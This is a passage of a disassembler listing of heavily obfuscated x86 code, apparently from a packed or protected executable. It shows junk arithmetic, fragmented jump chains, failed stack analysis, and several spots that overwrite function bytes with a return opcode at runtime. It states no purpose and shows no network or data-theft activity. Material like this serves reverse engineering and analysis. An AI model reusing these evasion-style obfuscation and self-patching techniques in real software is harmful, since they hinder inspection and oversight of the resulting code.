sub_442BE9	proc near		; DATA XREF: hvvrg7ie:0044C68Fo
		xor	edx, 71DB3815h
		add	edx, ebp
		add	edx, 5A56397h
		mov	[edx], eax
		pop	edx
		push	1Ch
		push	7C03E524h
		jmp	loc_45AB87
sub_442BE9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_442C06:				; CODE XREF: sub_449425+67A6j
		push	14F43E0Ah
		jmp	loc_43C7A9
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4591C3

loc_442C10:				; CODE XREF: sub_4591C3-229j
		jl	loc_44795B
; END OF FUNCTION CHUNK	FOR sub_4591C3
; START	OF FUNCTION CHUNK FOR sub_457774

loc_442C16:				; CODE XREF: sub_457774-D111j
		jmp	sub_443564
; END OF FUNCTION CHUNK	FOR sub_457774
; ---------------------------------------------------------------------------

loc_442C1B:				; CODE XREF: hvvrg7ie:0043D95Fj
		jmp	sub_447162
; ---------------------------------------------------------------------------
		pop	esi
		jmp	loc_4484CE
; ---------------------------------------------------------------------------

loc_442C26:				; CODE XREF: hvvrg7ie:00440621j
		pop	esi
		mov	ebx, [edx]
		cmp	edx, ebp
		jmp	loc_442686
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_442C30:				; CODE XREF: sub_449425-7F5j
		jbe	loc_4519B2
		pop	edi

loc_442C37:				; CODE XREF: sub_4484E1:loc_43C073j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4560CB
		jmp	loc_43BAB0
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_442C48:				; CODE XREF: sub_43B6A5:loc_4549ACj
		jz	loc_439F52
		jmp	loc_45ACFC
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
		xchg	edi, [ebx]
		jmp	loc_43D941
; ---------------------------------------------------------------------------
		cmp	ebp, 0FA0CA473h
		jmp	loc_449577
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_442C65:				; CODE XREF: sub_454099+321j
		jz	loc_4427DA
		jmp	loc_454178
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_442C70:				; CODE XREF: hvvrg7ie:00446862j
					; sub_456F9F:loc_456FB8j
		pop	esi
		mov	eax, ds:dword_45A8CC
		or	eax, eax
		jnz	loc_446CF1
		jmp	loc_45A437
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4498AE

loc_442C84:				; CODE XREF: sub_4498AE+12j
		or	edx, 0B0C45C85h
		xor	edx, 0A089121h
		call	sub_4513A7

loc_442C95:				; CODE XREF: sub_448881+FF39j
		jmp	loc_43BB40
; END OF FUNCTION CHUNK	FOR sub_4498AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_442C9A:				; CODE XREF: sub_44D47A+7895j
		jmp	loc_44FBF1
; END OF FUNCTION CHUNK	FOR sub_44D47A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_442C9F:				; CODE XREF: hvvrg7ie:00441CE2j
					; sub_45889B-9C63j
		add	eax, 2901A14Dh
		call	sub_450C5A
		mov	ds:dword_41D144, eax
		lea	eax, nullsub_5
		mov	byte ptr [eax],	0C3h
		jmp	loc_43BEF9
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
		call	nullsub_535
		jmp	loc_43A1E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45265D

loc_442CC8:				; CODE XREF: sub_45265D:loc_4550F3j
		or	ebx, ebp
		jmp	loc_43B11B
; END OF FUNCTION CHUNK	FOR sub_45265D
; ---------------------------------------------------------------------------

loc_442CCF:				; CODE XREF: hvvrg7ie:0044302Bj
		mov	esi, eax
		adc	eax, 8CE43413h
		xchg	ebp, eax
		adc	ecx, esi

loc_442CDB:				; CODE XREF: hvvrg7ie:0044301Aj
		or	eax, 499B6758h
		xor	eax, 0D398E8A8h
		push	edi
		pushf
		jmp	loc_4597F1
; ---------------------------------------------------------------------------
		shr	ebx, 1Bh
		jmp	loc_43E9D4
; ---------------------------------------------------------------------------

loc_442CF6:				; CODE XREF: hvvrg7ie:00456F89j
		xor	edi, 139DAFB3h
		call	sub_44F793
; START	OF FUNCTION CHUNK FOR sub_450E01

loc_442D01:				; CODE XREF: sub_450E01:loc_43ADE2j
		jl	loc_45B803

loc_442D07:				; CODE XREF: sub_453BBD+1692j
		jmp	loc_443F07
; END OF FUNCTION CHUNK	FOR sub_450E01
; ---------------------------------------------------------------------------
		popf
		jz	loc_44527B
		jmp	loc_45B803
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_442D18:				; CODE XREF: sub_43E60A-1905j
		jnb	loc_45836F

loc_442D1E:				; CODE XREF: sub_43E60A:loc_43CCF7j
		add	esi, 3A4B066Ah
		xchg	esi, [esp+0]
		jmp	loc_44F2C7
; END OF FUNCTION CHUNK	FOR sub_43E60A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_410. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_442D2D:				; DATA XREF: sub_439E6C+1EDC5o
		xchg	eax, [esp]
		jmp	sub_44059F
; ---------------------------------------------------------------------------

loc_442D35:				; CODE XREF: hvvrg7ie:0045697Aj
		jg	loc_43BDB0

loc_442D3B:				; CODE XREF: hvvrg7ie:00439693j
		add	ecx, 0FFC3C03Dh
		xchg	ecx, [esp]
		jmp	sub_43A87E
; ---------------------------------------------------------------------------

loc_442D49:				; CODE XREF: hvvrg7ie:loc_45B0CBj
		sbb	esi, edi

loc_442D4B:				; CODE XREF: hvvrg7ie:004524C1j
		and	edx, 0D8A435A3h
		xor	edx, 54E32000h
		add	eax, edx
		pop	edx
		rol	eax, 6
		push	edi
		push	28B0F081h
		jmp	loc_448F26

; =============== S U B	R O U T	I N E =======================================



sub_442D68	proc near		; CODE XREF: hvvrg7ie:0043FECFj
					; hvvrg7ie:00440241p

; FUNCTION CHUNK AT 00445BD0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446C72 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D1D4 SIZE 0000001F BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	ebx
		push	0F60287D3h
		pop	ebx
		jmp	loc_446C72
sub_442D68	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_225. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_442D79:				; CODE XREF: sub_45A234-19B77j
		jmp	sub_44CEC8
; END OF FUNCTION CHUNK	FOR sub_45A234
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_115. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F98C

loc_442D7F:				; CODE XREF: sub_43F98C:loc_448225j
		jz	loc_44BD4C
; END OF FUNCTION CHUNK	FOR sub_43F98C
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_442D85:				; CODE XREF: sub_4544DD-33F6j
		jmp	loc_44105F
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
		test	edx, ebp
		jmp	loc_43C7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_442D91:				; CODE XREF: sub_44BCAE-C5D8j
		or	esi, ds:4000F6h
		and	esi, 0A1F2EE8Dh
		cmp	esi, 0FB57D1DDh
		jmp	loc_45B3B3
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_442DA8:				; CODE XREF: sub_44059F:loc_43B18Fj
		call	sub_44D7C0

loc_442DAD:				; CODE XREF: sub_4569C6-1A2EEj
		jz	loc_459BC7
		test	edx, edi
		jmp	loc_452719
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_442DBA:				; CODE XREF: sub_4403D4-6AF2j
		mov	eax, [ebp+var_10]
		push	eax
		mov	eax, ecx
		xchg	eax, [esp+0Ch+var_C]
		mov	ecx, eax
		xchg	ecx, [esp+0Ch+var_C]

loc_442DC8:				; CODE XREF: hvvrg7ie:00449297j
		call	sub_43FA98

loc_442DCD:				; CODE XREF: sub_44E1C9:loc_44744Cj
		test	eax, eax
		jmp	loc_45431E
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_442DD4:				; CODE XREF: sub_450AA8-1227Fj
		mov	esi, [ebp+0]
		not	ebx
		jmp	loc_45B73A
; END OF FUNCTION CHUNK	FOR sub_450AA8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_140. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_442DDF:				; CODE XREF: hvvrg7ie:00457E56j
		jmp	loc_453DF3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C9B0

loc_442DE4:				; CODE XREF: sub_44C9B0+1455j
		jmp	loc_44C9BA
; END OF FUNCTION CHUNK	FOR sub_44C9B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45196D

loc_442DE9:				; CODE XREF: sub_45196D-5CDDj
		jmp	sub_447B07
; END OF FUNCTION CHUNK	FOR sub_45196D

; =============== S U B	R O U T	I N E =======================================



sub_442DEE	proc near		; CODE XREF: sub_451E9F-DABCp
					; hvvrg7ie:00448D4Ej

; FUNCTION CHUNK AT 00439439 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045ACD5 SIZE 0000000A BYTES

		xchg	edx, [esp+0]

loc_442DF1:				; CODE XREF: sub_4405D7:loc_4431B6j
		pop	edx

loc_442DF2:				; CODE XREF: hvvrg7ie:loc_443790j
		sub	eax, edx
		pop	edx
		jmp	loc_439439
sub_442DEE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_442DFA:				; CODE XREF: hvvrg7ie:00441B9Aj
		mov	edx, ecx
		pop	ecx
		mov	eax, [esp]
		push	edx
		call	sub_450F97
		mov	eax, 3C248B30h
		jmp	loc_457678
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BDCF

loc_442E10:				; CODE XREF: sub_43BDCF+7D60j
		push	offset loc_43A8BD
		jmp	nullsub_112
; END OF FUNCTION CHUNK	FOR sub_43BDCF
; ---------------------------------------------------------------------------

loc_442E1A:				; CODE XREF: hvvrg7ie:loc_451E68j
		pop	edx
		and	edx, 8B017B8Ah
		sub	edx, 1FEE901h
		rol	edx, 18h
		add	edx, 8081FEE7h
		jmp	loc_441562
; ---------------------------------------------------------------------------
		xchg	ebp, [edi]
		jmp	sub_458F43
; ---------------------------------------------------------------------------

loc_442E3C:				; CODE XREF: hvvrg7ie:00449EC2j
		jl	loc_4423E9

; =============== S U B	R O U T	I N E =======================================



sub_442E42	proc near		; CODE XREF: sub_44B9B4:loc_44B9CCp

; FUNCTION CHUNK AT 0043FA55 SIZE 00000008 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	ebx, 24AFC31Fh
		jmp	loc_43FA55
sub_442E42	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448FB0

loc_442E51:				; CODE XREF: hvvrg7ie:004460BBj
					; sub_448FB0:loc_455D0Ej
		xor	esi, 2BC73618h
		add	esi, 54E30F27h
		xchg	esi, [esp+0]
		jmp	loc_45858C
; END OF FUNCTION CHUNK	FOR sub_448FB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_442E65:				; CODE XREF: sub_43C0DE+10BD7j
		jnz	loc_43AB27
		xor	ebx, 4282516Dh
		xor	ebx, 906CD0C3h
		add	ebp, edi
		jmp	loc_443266
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
		mov	esp, ebp
		xchg	ebx, [esp]
		mov	ebp, ebx
		pop	ebx
		jmp	loc_456895
; ---------------------------------------------------------------------------

loc_442E8B:				; CODE XREF: hvvrg7ie:00459154j
		rol	esi, 10h
		add	esi, 0F8DAB9F3h
		rol	esi, 2
		xor	esi, 843C512Dh
		add	esi, 0AF1586A9h
		jmp	loc_44B2EE
; ---------------------------------------------------------------------------
		jge	loc_44972F
		xor	eax, ebp
		test	ebp, ebx
		jmp	loc_448926
; ---------------------------------------------------------------------------

loc_442EB7:				; CODE XREF: hvvrg7ie:004445D9j
		xchg	esi, [esp]
		mov	ecx, esi
		pop	esi
		or	ecx, 41E1C17Dh
		xor	ecx, 7A29232Ah
		or	ecx, ds:4000F2h
		add	ecx, 4044C890h
		push	offset loc_452171
		jmp	locret_4517D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E100

loc_442EDF:				; CODE XREF: sub_43E100:loc_44EE3Aj
		pop	edx
		sub	edx, ds:4000F3h
		xor	edx, 756495D9h
		sub	edx, 147DB87h
		jmp	loc_44EB38
; END OF FUNCTION CHUNK	FOR sub_43E100
; ---------------------------------------------------------------------------
		test	ecx, edi
		jmp	loc_4568FE
; ---------------------------------------------------------------------------

loc_442EFE:				; DATA XREF: hvvrg7ie:00439D31o
		rol	eax, 17h
		call	sub_44E5CA
; START	OF FUNCTION CHUNK FOR sub_439B29

loc_442F06:				; CODE XREF: sub_439B29+20159j
		jmp	loc_455B8A
; END OF FUNCTION CHUNK	FOR sub_439B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEA9

loc_442F0B:				; CODE XREF: sub_43EEA9+17B47j
		jmp	nullsub_463
; END OF FUNCTION CHUNK	FOR sub_43EEA9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_442F10:				; CODE XREF: sub_4413A5+12D32j
		jmp	loc_439985
; END OF FUNCTION CHUNK	FOR sub_4413A5

; =============== S U B	R O U T	I N E =======================================



sub_442F15	proc near		; DATA XREF: sub_45A5F4-C403o

; FUNCTION CHUNK AT 0044F9FB SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455A51 SIZE 0000000A BYTES

		push	66744731h
		pop	eax
		xor	eax, 277DF988h
		and	eax, 0F1AD3DD6h
		sub	eax, 48094CA4h
		cmp	eax, 0DA29FBE7h
		jmp	loc_44F9FB
sub_442F15	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_442F38:				; CODE XREF: sub_446D8D:loc_43F4B7j
		jb	loc_44E54D
		test	edx, 4E21028Fh
		jmp	loc_44AC54
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
		jz	loc_43D2B0
		jmp	sub_455BE2
; ---------------------------------------------------------------------------
		and	edx, ebx
		jmp	sub_43FDAE
; ---------------------------------------------------------------------------

loc_442F5B:				; CODE XREF: hvvrg7ie:loc_452DD8j
		jnb	loc_458CFF
		call	sub_447800
; START	OF FUNCTION CHUNK FOR sub_43EF3E

loc_442F66:				; CODE XREF: sub_43EF3E+12j
		jmp	loc_43EFE2
; END OF FUNCTION CHUNK	FOR sub_43EF3E

; =============== S U B	R O U T	I N E =======================================



sub_442F6B	proc near		; DATA XREF: sub_45697F+6o

; FUNCTION CHUNK AT 0043B144 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043C2C6 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043C342 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FDFC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004432EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446B9F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00448352 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00448807 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449357 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044FA9E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451135 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457E7D SIZE 00000005 BYTES

		cmp	al, 0A4h
		jz	loc_44D509
		jmp	loc_457E7D
sub_442F6B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_442F78:				; CODE XREF: hvvrg7ie:004570E9j
		test	ebp, 35FB1A4Bh
		jmp	loc_44F5C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451176

loc_442F83:				; CODE XREF: sub_451176+739Aj
		xchg	ecx, [esp-4+arg_0]
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_451176
; ---------------------------------------------------------------------------

loc_442F8C:				; CODE XREF: hvvrg7ie:004588B7j
		jmp	loc_444A4B
; ---------------------------------------------------------------------------
		push	ebp
		jmp	loc_44159A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451176

loc_442F97:				; CODE XREF: sub_451176-734j
		jz	loc_445A2A
		jmp	loc_442FEF
; END OF FUNCTION CHUNK	FOR sub_451176
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451110

loc_442FA2:				; CODE XREF: sub_451110-9798j
		jg	loc_443F9B
		sub	ecx, 10934BDAh
		sbb	ecx, 0C786F281h
		mov	edx, 0DF5FAE1h
		jmp	loc_449CE9
; END OF FUNCTION CHUNK	FOR sub_451110
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453934

loc_442FBE:				; CODE XREF: sub_453934+6j
		mov	eax, [ebp-8]
		cdq
		add	eax, [esp+0]
; END OF FUNCTION CHUNK	FOR sub_453934
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_442FC5:				; CODE XREF: sub_43E128:loc_450D2Dj
		adc	edx, [esp+arg_0]
		add	esp, 8
		jmp	loc_44D9B8
; END OF FUNCTION CHUNK	FOR sub_43E128

; =============== S U B	R O U T	I N E =======================================



sub_442FD1	proc near		; CODE XREF: sub_450434-A41Cp
					; hvvrg7ie:0044DB1Dj

var_14		= dword	ptr -14h
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00439011 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00439676 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00439780 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00439AD9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439FC1 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043A645 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B509 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043C77E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043C82D SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0043DAF6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043F593 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043F756 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F79D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00440A25 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00440B4E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004414B2 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00441A90 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00441ECA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441F19 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044205E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044270D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00442B0D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00444962 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004449B6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00448721 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00448892 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449D66 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044A4F6 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044A7DA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A865 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AADB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B58A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C608 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C85C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CF94 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044D76C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044E31D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044F9A3 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044FDA2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451F10 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00452FD0 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00453AFE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004557AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456923 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004580AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459288 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004594E8 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045A6C9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A883 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045AFC4 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045B28A SIZE 00000005 BYTES

		xchg	ecx, [esp+4+var_4]
		pop	ecx
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4449B6
		jmp	loc_44A7DA
sub_442FD1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A89A

loc_442FE3:				; CODE XREF: sub_43A89A+12j
		sub	ebx, 0BAA3C985h
		jns	loc_444F9A
; END OF FUNCTION CHUNK	FOR sub_43A89A
; START	OF FUNCTION CHUNK FOR sub_451176

loc_442FEF:				; CODE XREF: sub_451176-E1D9j
		jmp	loc_44D0D8
; END OF FUNCTION CHUNK	FOR sub_451176
; ---------------------------------------------------------------------------
		pop	ebp
		jmp	loc_444F94
; ---------------------------------------------------------------------------

locret_442FFA:				; CODE XREF: hvvrg7ie:0044AAABj
		retn
; ---------------------------------------------------------------------------

loc_442FFB:				; CODE XREF: hvvrg7ie:0044F62Fj
		jmp	loc_44C674
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAC8

loc_443000:				; CODE XREF: sub_45AAC8-11E6Ej
		jle	loc_4555F9
		jmp	loc_43E282
; END OF FUNCTION CHUNK	FOR sub_45AAC8
; ---------------------------------------------------------------------------
		push	318AE0E2h
		pop	eax
		xor	eax, 4FC0BB6h
		rol	eax, 1Eh
		jb	loc_442CDB
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_443020:				; CODE XREF: sub_43FC15-3EF6j
		jmp	loc_451EE3
; END OF FUNCTION CHUNK	FOR sub_43FC15
; ---------------------------------------------------------------------------
		or	edi, 2E40D110h
		jmp	loc_442CCF
; ---------------------------------------------------------------------------

loc_443030:				; CODE XREF: hvvrg7ie:0043A74Ej
		mov	byte ptr [eax],	0C3h
		jmp	loc_43F9A5

; =============== S U B	R O U T	I N E =======================================



sub_443038	proc near		; CODE XREF: sub_406214+27p
					; sub_40DE1D+134p ...
		call	sub_443048
		jmp	ds:off_41D150
sub_443038	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_443043:				; CODE XREF: sub_448100+674Ej
		jmp	loc_4552FF
; END OF FUNCTION CHUNK	FOR sub_448100

; =============== S U B	R O U T	I N E =======================================



sub_443048	proc near		; CODE XREF: hvvrg7ie:0043E88Dj
					; sub_443038p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440A00 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004453BA SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00447ECC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044FAEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450E56 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004517D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A702 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0045A8F3 SIZE 0000000E BYTES

		pop	edx
		jb	loc_45A702
		mov	eax, [esp-4+arg_0]
		push	edx

loc_443053:				; CODE XREF: sub_43D3B5:loc_45410Ej
		push	ecx
		jmp	loc_4453BA
sub_443048	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444F21

loc_443059:				; CODE XREF: sub_444F21:loc_44570Fj
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_444F21
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_44305B:				; CODE XREF: sub_45541B-10DEEj
		jmp	loc_443185
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448057

loc_443060:				; CODE XREF: sub_448057+4j
					; sub_4485A2+Fj
		xor	eax, eax
		push	offset loc_4433BB
		jmp	loc_444B00
; END OF FUNCTION CHUNK	FOR sub_448057
; ---------------------------------------------------------------------------
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_443B1C
		jmp	loc_4402AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44307E:				; CODE XREF: sub_43F227-11CAj
		cdq
		jmp	loc_4436BA
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_443084:				; CODE XREF: hvvrg7ie:004503ECj
		and	eax, ebp

; =============== S U B	R O U T	I N E =======================================



sub_443086	proc near		; CODE XREF: sub_4452F2+2p

; FUNCTION CHUNK AT 0044C323 SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		cmp	al, 0A4h
		jz	loc_4560C6
		jmp	loc_44C323
sub_443086	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451B45

loc_443097:				; CODE XREF: sub_451B45+1Cj
		add	edi, 0FBBAB5F0h
		mov	[edi], eax
		pop	edi

loc_4430A0:				; CODE XREF: sub_453E86:loc_451FC8j
		cmp	ds:dword_43D6F4, 0
		jnz	loc_455525
		jmp	loc_447817
; END OF FUNCTION CHUNK	FOR sub_451B45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_4430B2:				; CODE XREF: sub_451E6D:loc_45B7E9j
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_471
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edx
		jmp	loc_44A94A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D809

loc_4430C4:				; CODE XREF: sub_43D809-3A1Bj
		lea	eax, sub_43D809
		mov	byte ptr [eax],	0C3h
		jmp	loc_4589F1
; ---------------------------------------------------------------------------

loc_4430D2:				; CODE XREF: sub_43D809j
		xchg	ebx, [esp+0]
		mov	edx, ebx
		pop	ebx
		jmp	loc_43A546
; END OF FUNCTION CHUNK	FOR sub_43D809
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_85. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45943A

loc_4430DE:				; CODE XREF: sub_45943A-72EBj
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_45943A

; =============== S U B	R O U T	I N E =======================================



sub_4430E3	proc near		; CODE XREF: sub_43C2B2+Ap
					; hvvrg7ie:004490DDj ...

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		xchg	ecx, [esp-4+arg_0]
		jmp	sub_450C5A
sub_4430E3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_4430EF:				; CODE XREF: sub_44543A:loc_43C3B4j
		push	eax
		mov	eax, esp
		push	offset loc_443C69
		jmp	loc_458A0E
; END OF FUNCTION CHUNK	FOR sub_44543A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_4430FC:				; CODE XREF: sub_4465A6-967Bj
		add	esi, 0D5832714h
		xor	eax, esi
		pop	esi
		rol	eax, 17h
		push	ecx
		push	15257CB6h
		pop	ecx
		jmp	loc_441CAF
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_443114:				; CODE XREF: hvvrg7ie:loc_44EE23j
		jnz	loc_458EF0
		jmp	loc_442828
; ---------------------------------------------------------------------------

loc_44311F:				; CODE XREF: hvvrg7ie:loc_444EF3j
		push	eax

loc_443120:				; CODE XREF: hvvrg7ie:00439868j
		call	sub_44612F
		mov	[ebp-4], eax
		jmp	loc_43DAC6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4422A8

loc_44312D:				; CODE XREF: sub_4422A8:loc_440EB3j
